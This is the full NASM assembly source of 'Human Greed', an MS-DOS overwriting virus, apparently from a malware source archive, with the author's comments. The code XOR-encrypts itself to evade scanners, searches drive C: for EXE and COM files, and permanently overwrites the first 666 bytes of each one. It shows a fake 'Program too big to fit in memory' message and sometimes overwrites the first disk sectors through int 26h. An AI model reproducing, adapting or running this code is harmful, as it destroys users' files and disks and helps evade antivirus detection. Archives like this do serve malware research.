MalwareSourceCode/MSDOS/H-Index/Virus.MSDOS.Unknown.humgreed.asm

234 lines
7.7 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
; VirusName : Human Greed
; Origin : Sweden
; Author : The Unforgiven
; Date : 20/12/93
;
; This is a "mutation" of the Infernal Demand virus, written by Metal
; Militia. Even if it's high modified, its ground is still the same.
; This is yet another of this simple overwriting virus, and it's
; nothing really to scream hurray for. This virus will search for
; exe or com files on drive C:, and then overwrite the first 666
; bytes, and therefor permantely destroy the victims. It used the
; "dot-dot" method for changing directory, and when all files are
; infected (overwritten), it will return to the original directory.
; The code is encrypted, thus making it hard to detect. Scan,
; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit.
; Yes, Tbscan used to find this as the "Infernal" virus, but he
; with his 90% (nice try!) failed again!, how patetic!
;
; If a infected file is being run, it's 50% that it will display
; this stupid "Program to big to fit in memory" message. Then
; if the message is printed on the screen, it'll throw the dice
; once more. If the number are 10 or lower, it'll simple wipe out
; the first sectors by overwrite them on your C: drive. This means
; that for each run, it's 5% that it'll "go-off".
; The "message dump" to a file under c:\ has also been deleted.
; And the new routines wich are included are, encryption,
; get/and restore directory, the randomizer, print faker, and
; of'cos the trash routine too. Hope you enjoy the code!
;===============================================================================
; **** HUMAN GREED ****
;===============================================================================
cseg segment byte public
assume cs:cseg, ds:cseg
org 100h
virus_start:
call encrypt_decrypt
jmp encryption_start
write_virus: ; write the virus to the
call encrypt_decrypt ; files, by overwriting
mov dx,100h ; its beginning
mov ah,40h ;
mov cx,666 ; How sadistical??
int 21h ;
call encrypt_decrypt ;
ret
encryption_value dw 0
encrypt_decrypt:
mov si,offset encryption_start
mov dx,encryption_value
mov cx,(end_of_virus-encryption_start+1)/2
xor_loop:
xor word ptr cs:[si],dx
add si,2
call fool_scan_for_TridenT_virus ; must call this meaningless
loop xor_loop ; routine, otherwise, infected
ret ; files will be reported by
fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus.
ret
; just return.
encryption_start:
; get current drive
mov ah,19h ; get current drive
int 21h ;
push ax ;
; move to c:
mov ah,0Eh ;
mov dl,02h ; drive C:
int 21h
; get directory.
mov ah,47h
xor dl,dl
lea si,[bp+infernal+2ch]
int 21h
great:
; find first files (starting .exe's).
mov dx,offset ExeMask ; offset 'EXEMASK'
mov ah,4Eh ; find first
int 21h ; via int21
jnc go_for_it ; jmp if no ERROR
; if no exe's was found, just infect.COM files.
mov dx,offset ComMask ; offset 'COMMASK'
mov ah,4Eh ; find first file
;
again: ;
int 21h ;
jc chdir ;
go_for_it:
mov ax,4300h ; Get attribute of file
mov dx,9eh ; Pointer to name in DTA
int 21h ;
push cx ; Push the attrib to stack
mov ax,4301h ; Set attribute to
xor cx,cx ; normal
int 21h ;
mov ax,3D02h ; Open file
mov dx,9eh ; Pointer to name in DTA
int 21h
jc next ; if error, get next file
xchg ax,bx ; Swap AX & BX
; so the filehandle ends up
; in BX
mov ax,5700h ; Get file date
int 21h ;
push cx ; Save file dates
push dx ;
mov encryption_value,50 ; encryption_value.
call write_virus ; write to file(s).
pop dx ; Get the saved
pop cx ; filedates from the stack
mov ax,5701h ; Set them back to the file
int 21h ;
mov ah,3Eh ; Close the file
int 21h ;
pop cx ; Restore the attribs from
; the stack.
mov dx,9eh ; Pointer to name in DTA
mov ax,4301h ; Set them attributes back
int 21h ;
next:
mov ah,4Fh ; now get the next file
jmp short again ; and do it all over again
chdir:
; change directory to [..] and start infect again.
mov dx,offset dot_dot ; offset 'updir'
mov ah,3bh ; change directory
int 21h
jnc great ; jmp to great if no ERROR
exit:
; Throw the dice..
mov ah,2ch ;
int 21h ;
cmp dl,50
ja real_quit ;
jmp print
; no, quitting time, yet..
print:
; first print message.
mov ah,09h ; Print Fake message.
mov dx,offset sign ;
int 21h ;
get_random:
; Throw of a die..
mov ah,2ch ; Randomize.
int 21h ;
cmp dl,10 ;
ja real_quit ;
jmp trash ; bad bad boy..
trash:
; Trash routine from Nowhere Man of [NuKE], thanks.
cli ;
mov ah,2 ; 2=C:
cwd ;
mov cx,0100h ;
int 026h ;
JMP REAL_QUIT
real_quit:
pop dx ;
mov ah,0Eh ; restore org. drive
int 21h ;
; restore directory
lea dx,[bp+infernal+2ch]
mov ah,3bh
int 21h
; time to quit
mov ah,4ch ; return to prompt
int 21h ; via int21
; some data.
ExeMask db '*.EXE',0 ; tought one, huh?
ComMask db '*.COM',0 ; what is this, hm
dot_dot db '..',0 ; '..'
Note db 'That is not dead '
db 'Which can eternal lie '
db 'Yet with strange aeons '
db 'Even death may die '
db 'LiVe AfteR DeATH...'
db 'Do not waste your time '
db 'Searching For '
db 'those wasted years! '
db '(c) 93/94 The Unforgiven/Immortal Riot '
db 'Thanks to Raver and Metal Militia/IR '
truenote db 'Maria K - Life is limited, love is forever... '
db 'Open to reality, forever in love... '
sign db 'Program too big to fit in memory$' ; fake message!
sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! '
db 'Do You Belive? '
db 'Farwell!....'
end_of_virus:
infernal:
cseg ends
end virus_start